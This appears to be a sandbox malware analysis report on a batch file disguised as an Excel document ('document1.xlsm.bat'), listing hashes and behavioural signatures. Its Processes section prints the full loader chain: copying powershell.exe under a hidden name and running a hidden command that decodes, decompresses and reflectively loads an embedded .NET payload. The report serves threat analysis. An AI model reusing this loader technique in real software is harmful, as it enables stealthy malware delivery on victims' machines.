Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
08-05-2024 16:14
Static task
static1
Behavioral task
behavioral1
Sample
document1.xlsm.bat
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
document1.xlsm.bat
Resource
win10v2004-20240426-en
General
-
Target
document1.xlsm.bat
-
Size
2.5MB
-
MD5
b35dd1b0c0a8eacd45751dc8915c921b
-
SHA1
69ec58d6a3fced2e8cf8afcad404e622f732ba64
-
SHA256
35b1f297074282d80109a55ffa2250719618fb94d1ffb89f2af71088000e4842
-
SHA512
c91063cfcd257d3e056c9625538106c27fbcf15963d1ab8c6fac5ef7ba90adfe14028dd1231157e9e8c4b2aaffa3a6995d78356bd70321999f4c3116332b2b8f
-
SSDEEP
24576:B3tFuAl5/Sq8tSKHGvFu6n0RXTiRJQQ49ZJ7Mr1/rfU2fdvFShyJDgyxK5If6Yc0:9nKqoH36ncXsCyhAJXIyYCOi4bwFMV
Malware Config
Signatures
-
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 1616 attrib.exe -
Executes dropped EXE 1 IoCs
pid Process 2560 document1.xlsm.bat.Agk -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2560 document1.xlsm.bat.Agk -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2560 document1.xlsm.bat.Agk -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2560 document1.xlsm.bat.Agk -
Suspicious use of WriteProcessMemory 13 IoCs
description pid Process procid_target PID 2548 wrote to memory of 2552 2548 cmd.exe 29 PID 2548 wrote to memory of 2552 2548 cmd.exe 29 PID 2548 wrote to memory of 2552 2548 cmd.exe 29 PID 2548 wrote to memory of 3020 2548 cmd.exe 30 PID 2548 wrote to memory of 3020 2548 cmd.exe 30 PID 2548 wrote to memory of 3020 2548 cmd.exe 30 PID 2548 wrote to memory of 1616 2548 cmd.exe 31 PID 2548 wrote to memory of 1616 2548 cmd.exe 31 PID 2548 wrote to memory of 1616 2548 cmd.exe 31 PID 2548 wrote to memory of 2560 2548 cmd.exe 32 PID 2548 wrote to memory of 2560 2548 cmd.exe 32 PID 2548 wrote to memory of 2560 2548 cmd.exe 32 PID 2548 wrote to memory of 2560 2548 cmd.exe 32 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 1616 attrib.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\document1.xlsm.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2548 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F "2⤵PID:2552
-
-
C:\Windows\system32\xcopy.exexcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\document1.xlsm.bat.Agk2⤵PID:3020
-
-
C:\Windows\system32\attrib.exeattrib +s +h C:\Users\Admin\AppData\Local\Temp\document1.xlsm.bat.Agk2⤵
- Sets file to hidden
- Views/modifies file attributes
PID:1616
-
-
C:\Users\Admin\AppData\Local\Temp\document1.xlsm.bat.AgkC:\Users\Admin\AppData\Local\Temp\document1.xlsm.bat.Agk -WindowStyle hidden -command "$Dpaixwue = Get-Content 'C:\Users\Admin\AppData\Local\Temp\document1.xlsm.bat' | select-object -Last 1; $Cbgbn = [System.Convert]::FromBase64String($Dpaixwue);$Wrshbyf = New-Object System.IO.MemoryStream( , $Cbgbn );$Vqjgxif = New-Object System.IO.MemoryStream;$Hbhfx = New-Object System.IO.Compression.GzipStream $Wrshbyf, ([IO.Compression.CompressionMode]::Decompress);$Hbhfx.CopyTo( $Vqjgxif );$Hbhfx.Close();$Wrshbyf.Close();[byte[]] $Cbgbn = $Vqjgxif.ToArray();[Array]::Reverse($Cbgbn); $Zbupjnbsv = [System.Threading.Thread]::GetDomain().Load($Cbgbn); $Rzfvpsrcsoi = $Zbupjnbsv.EntryPoint.DeclaringType.GetMethods()[0].Invoke($null, $null) | Out-Null"2⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2560
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
442KB
MD592f44e405db16ac55d97e3bfe3b132fa
SHA104c5d2b4da9a0f3fa8a45702d4256cee42d8c48d
SHA2566c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7
SHA512f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f